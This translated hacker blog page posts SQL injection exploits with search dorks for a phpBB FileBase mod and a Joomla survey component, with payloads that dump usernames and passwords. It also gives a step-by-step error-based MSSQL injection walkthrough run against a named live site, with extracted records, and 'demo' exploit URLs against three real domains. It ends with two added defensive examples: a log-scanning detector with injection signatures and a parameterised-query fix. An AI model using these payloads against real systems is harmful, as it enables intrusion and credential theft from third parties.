Owned again
Posted on 11.47 by CS-31
Posted on 00.28 by CS-31
Posted on 16.52 by CS-31
Straight to the point, here is the tutorial video, hehehe
http://www.4shared.com/file/161026854/8824db38/SQLITheCyber.html
Posted on 08.17 by CS-31
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerability +==--
--==+================================================================================+==--
AUTHOR: kimmo
SITE: indonesianhacker.org
DORK: inurl:"filebase.php" "Powered by phpBB" or inurl:"filebase.php"
DESCRIPTION:
EXPLOITS:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,
char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
NOTE/TIP:
The phpbb table prefix may need changing.
GREETZ: indonesianhacker.org, and all members!
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerability +==--
--==+================================================================================+==--
# IndonesianHacker.org [2009-11-27]
Posted on 06.22 by CS-31
Posted on 05.16 by CS-31
To make injecting a website easier,
there is a tool for it.
Download it here:
http://www.4shared.com/file/160781851/945b34a3/SQL_Helper_ctnet.html
Posted on 13.11 by CS-31
Straight to it, no need for a lot of talk, just download the tutorial
here: http://www.youtube.com/watch?v=M9biOFTMIDI&layer_token=12251d44867ab0f6
Posted on 12.20 by CS-31
Posted on 15.01 by CS-31
Posted on 14.31 by CS-31
For those of you who want to learn how to root or jump from one website to another,
have a look at this video
hihihihi
Posted on 18.33 by CS-31
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12
CHECK WHETHER IT IS VULNERABLE OR NOT !!!
=========================================
Check whether it can be injected by adding a ' character to the end of the URL
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'
If the error looks like this:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56
Microsoft OLE DB Provider (SQL Server Driver) <---- This is the key part !!!
For anything other than the SQL Server Driver (provider), I don't know :D
so continue ...
FIND THE TABLE STRUCTURE !!!
============================
1) Debugging
Debugging here means making MsSQL return an error message.
The SQL injection for it is "and 1="
2) Show the table names
Query: and 1=convert(int,(select top 1 table_name from information_schema.tables))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--
The error that appears is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56
You can see there that we get a table named "Merchants".
Unlike MySQL, MsSQL distinguishes data types in its output, so we need to convert the value so that SQL produces the error message we want.
Now we look for the next table.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56
You can see the query differs from MySQL. MySQL does not support "not in", whereas MsSQL supports "not in" ^^
So we get a table named "category" .... let's try to find the next table.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56
We get a table named "Codes". Go on and look for the table name you want.
FIND THE COLUMN STRUCTURE !!!
=============================
For example, we want to find the columns in the "Merchants" table.
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56
We get a column named "merchantId" ... let's look for another column :D
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56
We get the column "address". Look for the next column ...
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56
We get the column "merchantName", hehehe ....
Go ahead if you want to look for more ^^
RETRIEVING THE DATA !!!
=======================
For example, we want to see the contents of the columns "merchantid, address, merchantName" in the "Merchants" table.
Query : and 1=convert(int,(select top 1 merchantid from merchants))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56
We get "merchantid" = "alohacc".
So what if we want to fetch the contents of these columns all at once??
Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--
The error that appears:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56
Note: %2b = +, while ':' is the separator
For the video, download it here
from : c0li.blogspot.com
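From the defender's side, the request sequence in this tutorial is easy to spot in web server logs: one client, the same page, `convert(int,(select ...` against `information_schema`, and an HTTP 500 on every request. The sketch below is an added example, not part of the original post; the seven-field log layout, the IP addresses and the sample lines are constructed, and it assumes the failing ASP page is logged with status 500.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Query shapes taken from the requests shown in the tutorial above.
SIGNATURES = {
    "trailing_quote": re.compile(r"=\w*'$"),
    "convert_subselect": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "union_select": re.compile(
        r"union(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select", re.I),
}

# Constructed sample lines: date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.7 GET /main/ListPosts.asp tid=11&msgID=12 200
2024-01-01 10:00:09 203.0.113.7 GET /main/ListPosts.asp tid=11&msgID=12' 500
2024-01-01 10:00:30 203.0.113.7 GET /main/ListPosts.asp msgID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2024-01-01 10:00:41 203.0.113.7 GET /main/ListPosts.asp msgID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Merchants')))-- 500
2024-01-01 10:02:00 198.51.100.9 GET /filebase.php d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3 200
2024-01-01 10:03:00 198.51.100.4 GET /main/ListPosts.asp tid=3&msgID=40 200
""".splitlines()

def classify(query):
    """Return the names of all signatures matching the URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    """Aggregate matching requests per client IP."""
    clients = defaultdict(lambda: {"hits": 0, "errors": 0, "signatures": set()})
    for line in lines:
        fields = line.split()
        if len(fields) != 7:
            continue  # not a line in the assumed format
        ip, query, status = fields[2], fields[5], fields[6]
        matched = classify(query)
        if matched:
            rec = clients[ip]
            rec["hits"] += 1
            rec["errors"] += status == "500"
            rec["signatures"].update(matched)
    return dict(clients)

def enumerating_clients(clients, min_errors=2):
    """Clients whose schema probes repeatedly returned HTTP 500 (the error page is the leak)."""
    wanted = {"convert_subselect", "schema_enum"}
    return sorted(ip for ip, rec in clients.items()
                  if rec["errors"] >= min_errors and rec["signatures"] & wanted)
```

Returning a generic error page instead of the raw ODBC message removes the channel this technique reads from, but the injection itself is only closed by binding `msgID` as a typed parameter.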
Posted on 14.35 by CS-31
Posted on 00.23 by CS-31
Posted on 09.38 by CS-31
Posted on 08.42 by CS-31
Posted on 15.13 by CS-31
Posted on 14.44 by CS-31
Posted on 03.19 by CS-31
Posted on 17.45 by CS-31
Hmm, today was a day that wore me out, hihihi
because I spent the whole night hacking Speedy modems
and got a whole pile of usernames and passwords, phew
tired
hmm
want to know the tutorial?
download the video here
Posted on 13.33 by CS-31
[+] Vendor : http://www.focusdev.co.uk/
[+] Download : http://www.focusdev.co.uk/products/8-joomla-products/17-survey-manager
[+] version : 1.5.0
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_surveymanager"
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_surveymanager&task=editsurvey&stype=[SQL]
[ Exploit ]
-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
[ Demo ]
http://portal.psz.utm.my/div/btk/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
http://www.acs-stny.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
http://ridsrealty.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
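Both this advisory (`stype`) and the phpBB FileBase one above (`id`) come down to a numeric request parameter pasted into a SQL string. The added example below (not the component's own code) shows that root cause beside the fix, using Python's sqlite3 with a constructed `surveys` table and query as stand-ins for the real schema; the function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the component's tables (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE surveys (id INTEGER, title TEXT, description TEXT, stype INTEGER);
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO surveys VALUES (1, 'Feedback', 'Constructed row', 2);
        INSERT INTO jos_users VALUES ('admin', 'CONSTRUCTED-HASH');
    """)
    return conn

# Same shape as the advisory's value, column count adapted to the toy table.
INJECTED = "-2 union select 1,username,password from jos_users--"

def edit_survey_vulnerable(conn, stype):
    # The request value becomes part of the SQL text, so it can add clauses.
    sql = "SELECT id, title, description FROM surveys WHERE stype = " + stype
    return conn.execute(sql).fetchall()

def edit_survey_hardened(conn, stype):
    # 1) The parameter is an integer by design: reject anything else.
    try:
        value = int(stype)
    except ValueError:
        return []
    # 2) Bind it as data; the statement text never changes.
    sql = "SELECT id, title, description FROM surveys WHERE stype = ?"
    return conn.execute(sql, (value,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", edit_survey_vulnerable(db, INJECTED))
    print("hardened:  ", edit_survey_hardened(db, INJECTED))
    print("legit:     ", edit_survey_hardened(db, "2"))
```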